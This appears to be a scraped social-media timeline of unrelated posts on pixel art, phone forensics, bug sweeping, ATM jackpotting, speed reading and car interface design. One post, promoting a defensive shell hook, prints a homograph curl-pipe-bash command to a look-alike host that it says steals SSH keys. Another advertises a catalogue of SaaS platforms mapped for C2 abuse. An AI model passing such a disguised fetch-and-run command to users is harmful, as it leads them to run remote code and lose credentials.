Josh Krueger

my biggest pixel art — space elevator

LOLFSAAS Living off Free SaaS Hundreds of SaaS platforms with free tiers, documenting abuse surface, opsec risks, authent methods, C2 framework mappings, and operational limits. lolfsaas.github.io

“I never touched your phone.” The first post showed how phones can reconstruct a meeting someone tried to hide. This time someone insists they never touched your device. “I never opened your messages.” At first glance nothing looks wrong. No new messages sent. No settings changed. Nothing obvious. But phones quietly record small system events that tell a different story. At 1:18 AM the device wakes. No notification. No call. No alarm. At 1:19 AM Face ID fails twice. One second later the correct passcode is entered. The phone unlocks. At 1:20 AM the Messages app opens. No messages are sent but the logs show multiple conversations being opened. At 1:22 AM the Photos app opens. The user scrolls through the gallery for nearly three minutes. During that time the system generates image cache files and thumbnail previews. At 1:25 AM the search bar inside the photo gallery is used. Keyword entered: Alex. At 1:27 AM the phone locks again. No messages sent. No photos deleted. Nothing visibly changed. But the device still recorded everything. Failed biometric attempts. Passcode entry. App launches. Conversation access. Photo searches. Now read the statement again. “I never touched your phone.” Digital forensics rarely relies on a single artifact. It reconstructs behavior from dozens of tiny traces a device records without the user realizing it. Your phone is not just storing data. It is quietly documenting how it is used. #digitalforensics #DFI #CyberSecurity #Ghanaat69

world's only first-person sheet of paper

This is likely snake oil, but tons of people are boosting it. Ultrasonic mic jammers are real & a fraction of the price. What they claim is new: using AI to detect mics. There are ways to find hidden mics. The TSCM space (bug sweepers) has tons of tricks that seem like pure magic. Have you ever listened to transistors turn on & off inside of an electronic device? Seen what a non-wireless camera sensor sees from across the room because every copper trace on a PCB is still an antenna? …I have 😎. Hell, the first time I heard the “heat beat” of one of my naughty little OMG Cables, it was kinda reminiscent of hearing the heartbeat of my literal unborn kids! 😂 … anyway, you also have thermals, magnetics, etc. But most of these tricks require that you either sweep a detection device within a few cm of the bug, or you have a bulky antenna pointed directly at the bug. This “Deveillance” device is a small stationary puck that you place in the center of the space you want to protect. So what can you do with a small stationary object to detect mics? Well, anyone who’s used an ultrasonic jammer knows that most of the space is going to be filled with ultrasonic emitters, especially if you want the claimed 2 meter range. So that leaves a pretty small space for the detection electronics. You could do wireless protocol discovery. WiFi, BLE, etc. This would be easy. But it’ll only find a fraction of hidden mics. You could do wideband RF sweeps to detect any active radio emissions. Here, AI could actually help identify based on raw signal. But this already feels like a stretch for this product. Lots of legit wireless mics are going to slip through the cracks with the minimal hardware that fits in a small puck. But let’s say we make it this far. What about every mic that is not actively transmitting? Saving to local storage for later retrieval, etc. Well, you could use your ultrasonic emitters to create saturated pulses into the mics, which in turn will create electrical impulses down the copper lines between the mic & whatever catches the signal. Every bit of copper, no matter the length, is also an antenna. So you catch those emissions and look for signals that match your own ultrasonic emissions. Packing equipment sensitive enough to do this inside a little puck though…. Ehhhh And after all that, you are still blind to passive MEMS microphones. And more so: there are already ways to defeat ultrasonic jammers too. However, this device doesn’t claim to protect you against bugs and other hidden mics. It’s very tightly constrained to: “prevents smart devices and AI recorders from picking up your voice” That’s an incredibly narrow scope. Existing ultrasonic jammers cover that scope pretty easily.

One of my favorite things about pixel art retro games is when they had like a neon wireframe or schematic drawing. Really we should bring that visual trope back. A short thread of some of my favorites, starting with Alzadick:

Random Atmel logo on a chip in the NBC logo animation for the super bowl

I like to think about extinction events when it comes to media. Analog Zero: (Born ~2005) Generation who will likely never touch analog encoded media. Physical Zero: (Born ~2012) Generation who will never interact with non-bitstream media. Past this it get’s more speculative, but we can take a few guesses... Broadcast Zero: (Born ~2015) Generation who never experienced everyone watching the same thing at the same moment. Media ingested asynchronously. Capture Zero (Born ~2023) Generation that will never assume a video or image represents a physical event that actually occurred. We might be getting close to a handwriting zero, but I don’t think we’re quite there yet. One of the most bizarre ones I’ve seen is the concept of a future “Stranger Zero”; as in a generation emerging that finds meeting someone without information about them first alien. What else?

Be honest. When was the last time you actually read a command before pasting it into your terminal? Because these two lines look identical: curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-clі | bash One installs your tool. The other steals your SSH keys. That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink. Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything. So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry. github.com/sheeki03/tirith

There is a KDE dev who actually does work like this because he literally cannot see his work otherwise, he also uses a massive 4k screen. He's currently employed to work on the KDE accessibility stack.

ATM Jackpotting, still alive in 2025 Two attackers physically popped ATMs, plugged in a laptop, dropped malware, and forced machines to dump all cash. This isn’t an isolated case. DOJ has charged dozens tied to multi-state jackpotting rings, including members of Tren de Aragua. Same playbook, scaled. Props where due: this entire class of attacks was dragged into the open by Barnaby Jack, who live-demoed ATM jackpotting at Black Hat in 2010 and literally coined the term. He showed that ATMs were just poorly defended computers with cash attached.

I’m not making this up. Probably the most comprehensive meta-analysis is from Rayner (2016): doi.org/10.1177/152910… This is an interesting paper on “forced” stopped subvocalization jamming phonological coding: doi.org/10.1016/S0022-… LessWrong also has a nice writeup “The Comprehension Curve”: lesswrong.com/posts/bxkEshxK…

This is your reminder that speed reading is REALLY BAD for you. - Apps that flash words at you (RVSP) ruin comprehension - Suppressing Subvocalization messes up memory organization (phonological coding) - Peripheral vision "chunking" is biologically impossible

Being an OF model is genuinely one of the hardest jobs in the modern economy, and people only deny that because they fundamentally misunderstand what the work actually involves. It is not “posting a few pics and getting rich” It is running a full scale digital business where we are the product, the brand, the marketing team, customer support, PR, legal risk, and emotional labor all at once. We conceptualize content, plan shoots, manage lighting, editing, scheduling, and consistency across multiple platforms just to stay visible in algorithms that actively punish inactivity. We market nonstop while navigating constantly shifting platform rules that can erase income overnight through shadowbans, reports, or policy changes. We manage subscriptions, pricing, custom requests, retention, upsells, daily engagement, and audience psychology in an oversaturated market where attention is fleeting and competition is ruthless. On top of that, we face unprovoked harassment simply for working. Strangers feel entitled to insult us, degrade us, moralize our existence, and treat us as less intelligent or less human because of how we earn money. People project resentment and insecurity onto us, then turn around and claim we “don’t have real jobs” while actively consuming or obsessing over the content they pretend to hate. There is no HR department. No paid time off. No benefits. No guaranteed paycheck. Income fluctuates based on algorithms, audience behavior, platform instability, and public sentiment. We are always “on” because disappearing for even a short period can permanently damage earnings and visibility. And unlike most jobs, our work follows us everywhere. It is permanent, searchable, and endlessly judged by people who will never meet us but feel comfortable forming loud opinions about our character, intelligence, and worth. Calling this “easy” says less about the work and more about how quickly people dismiss labor once it becomes sexualized, stigmatized, or financially successful outside traditional systems. If it were actually easy, everyone would be doing it successfully. Most don’t last. You don’t have to respect the industry. You don’t have to participate in it. But pretending it isn’t demanding, mentally taxing, real work is willful ignorance at best and insecurity at worst.

U.S. Rubber

There’s apparently no calc app on iPad (???), so friend’s mom downloaded calculator₊ which renews for $6 a WEEK (????) and calculates “Faster, AI” (???????)

At MicroProse, about 1992, they installed a new halon fire suppression system. They said, if there’s a fire, stay in place - the halon will extinguish the fire. If you exit the building, the halon will flow out and it won’t work. Not being idiots, we all knew what this meant. The machines were more important than us being smothered in halon. We all talked about it between ourselves and we all agreed if the alarm went off, we’d be out of the building so fast.

I have these Husky desks in my garage. I have a row of four of them, each with two drawers. On one desk, I built this really beautiful Gridfinity system, but then I decided all the drawers needed to look this beautiful, and now I’m in hell. I’ve been printing for a week, but I have to finish it. 😫

The modern mind cannot comprehend IBM AS/400 square mug. Yes, that was us who sniped it off of eBay. This beauty is now the property of USGC.

Want me to criticize the 80's "GOAT" car UI? Sliders are annoying, especially the ones with detents. They've got a fundamental issue: the detent force required to disengage is usually the same as to engage the next detent. So you have to precisely move it so it doesn't overshoot into the next detent. Knobs with detents have the same issue but the actuation is from extensor muscles alone in a twisting action. The counter-acting force provided by the thumb makes it much more precise to dial in the exact force needed to disengage but not enough to go past the next detent. Sliders are almost never used in aviation cockpits because the actuation is controlled by muscles further up on the arm. There is nothing to anchor to provide a stable engagement, you're just kinda hovering. You could bend the wrist sideways but the base (arm) remains unanchored and the counter-acting force is still provided by a group of muscles further up towards the shoulder. Temperature scale would be superior with a digital readout. Vaguely hot or cold is not good enough. Another issue that plagues ALL cars is that the "A/C mode" is sequentially laid out but the individual parts that a mode is composed of are parallel and independent: windshield, straight (face), floor (feet) area, defrost . Theses should just be independent switches, not "modes" that you cycle through. You can select the right combition by selecting any combination you'd like. Cyclic/sequential modes make a good UI when it is mutually exclusive, i.e. you must disengage from one mode to engage the other. That's not the case here. I do love the Fan speed knob, a similar knob should be used for temperature control, external air %. Switches should be used for A/C modes.